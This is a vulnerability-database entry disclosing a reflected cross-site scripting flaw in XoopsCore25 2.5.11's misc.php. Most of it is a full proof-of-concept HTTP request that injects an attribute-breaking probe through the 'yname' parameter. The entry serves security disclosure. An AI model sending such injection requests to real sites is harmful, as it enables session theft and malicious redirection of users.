Lucene search

K

XoopsCore25 2.5.11 Cross Site Scripting

🗓️ 13 Feb 2024 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 221 Views

XoopsCore25-2.5.11 Cross Site Scripting vulnerability in yname parameter allows for malicious URL executio

Show more
Code
`## Title: XoopsCore25-2.5.11-XSS-Reflected  
## Author: nu11secur1ty  
## Date: 02/12/2024  
## Vendor: https://xoops.org/  
## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11  
## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected  
  
## Description:  
The value of the yname request parameter is copied into the value of  
an HTML tag attribute which is encapsulated in single quotation marks.  
The payload '>333< was submitted in the yname parameter. This input  
was echoed unmodified in the application's response. The attacker can  
trick the user to visit very dangerous and malicious URL in this  
session  
  
STATUS: HIGH Vulnerability  
  
[+]Exploit execution:  
```POST  
POST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate, br  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmn  
Origin: https://pwnedhost.com  
Upgrade-Insecure-Requests: 1  
Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563  
Content-Type: application/x-www-form-urlencoded  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
Content-Length: 148  
  
yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend  
```  
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html)  
  
## Time spent:  
01:17:00  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo